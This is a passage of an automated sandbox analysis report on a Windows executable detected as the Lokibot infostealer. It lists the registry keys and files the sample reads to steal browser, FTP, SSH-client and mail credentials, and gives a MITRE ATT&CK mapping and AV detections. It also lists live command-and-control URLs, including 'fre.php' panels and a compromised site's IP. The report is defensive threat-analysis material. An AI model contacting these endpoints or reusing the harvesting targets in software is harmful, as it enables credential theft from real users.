                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00406069 GetUserNameW,
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected LokibotShow sources
                  Source: Yara matchFile source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE
                  Yara detected LokibotShow sources
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Tries to steal Mail credentials (via file registry)Show sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: PopPassword
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: SmtpPassword
                  Source: Yara matchFile source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE

                  Remote Access Functionality:

                  barindex
                  Yara detected LokibotShow sources
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery111Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Virtualization/Sandbox Evasion2Credentials in Registry2Virtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Conan Fegan - Aluminium.exe100%AviraHEUR/AGEN.1138558
                  Conan Fegan - Aluminium.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack100%AviraHEUR/AGEN.1138558Download File
                  5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack100%AviraHEUR/AGEN.1138558Download File
                  0.2.Conan Fegan - Aluminium.exe.960000.0.unpack100%AviraHEUR/AGEN.1138558Download File
                  0.0.Conan Fegan - Aluminium.exe.960000.0.unpack100%AviraHEUR/AGEN.1138558Download File
                  5.2.Conan Fegan - Aluminium.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.comionF0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/;0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cnO0%Avira URL Cloudsafe
                  http://kbfvzoboss.bid/alien/fre.php0%Avira URL Cloudsafe
                  http://www.fonts.comc0%URL Reputationsafe
                  http://www.fonts.comc0%URL Reputationsafe
                  http://www.fonts.comc0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.ritcophysiotherapy.com.au/wap121/five/fre.php0%Avira URL Cloudsafe
                  http://alphastand.top/alien/fre.php0%Avira URL Cloudsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.ibsensoftware.com/0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm-0%Avira URL Cloudsafe
                  http://alphastand.win/alien/fre.php0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://alphastand.trade/alien/fre.php0%Avira URL Cloudsafe
                  http://www.fontbureau.coma0%URL Reputationsafe
                  http://www.fontbureau.coma0%URL Reputationsafe
                  http://www.fontbureau.coma0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.founder.com.cn/cn/0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn90%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                  http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                  http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sajatypeworks.coma0%URL Reputationsafe
                  http://www.sajatypeworks.coma0%URL Reputationsafe
                  http://www.sajatypeworks.coma0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.fontbureau.commi0%Avira URL Cloudsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.founder.com.cn/cng0%Avira URL Cloudsafe
                  https://www.ritcophysiotherapy.com.au/wap121/five/fre.php0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cnFk0%Avira URL Cloudsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.ritcophysiotherapy.com.au
                  203.170.84.89
                  truetrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://kbfvzoboss.bid/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.ritcophysiotherapy.com.au/wap121/five/fre.phptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://alphastand.top/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://alphastand.win/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://alphastand.trade/alien/fre.phptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ritcophysiotherapy.com.au/wap121/five/fre.phptrue
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.comionFConan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.founder.com.cn/cn/;Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.founder.com.cn/cnOConan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designersGConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                            high
                            http://www.fonts.comcConan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/bTheConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers?Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                              high
                              http://www.ibsensoftware.com/Conan Fegan - Aluminium.exe, Conan Fegan - Aluminium.exe, 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.tiro.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                high
                                http://www.galapagosdesign.com/staff/dennis.htm-Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.goodfont.co.krConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.comaConan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssConan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.carterandcone.comlConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sajatypeworks.comConan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn/Conan Fegan - Aluminium.exe, 00000000.00000003.636630818.0000000005B56000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.typography.netDConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/cTheConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://fontfabrik.comConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnConan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/frere-user.htmlConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn9Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers8Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.ascendercorp.com/typedesigners.htmlConan Fegan - Aluminium.exe, 00000000.00000003.638473832.0000000005B8D000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fonts.comConan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.krConan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comaConan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpfalse
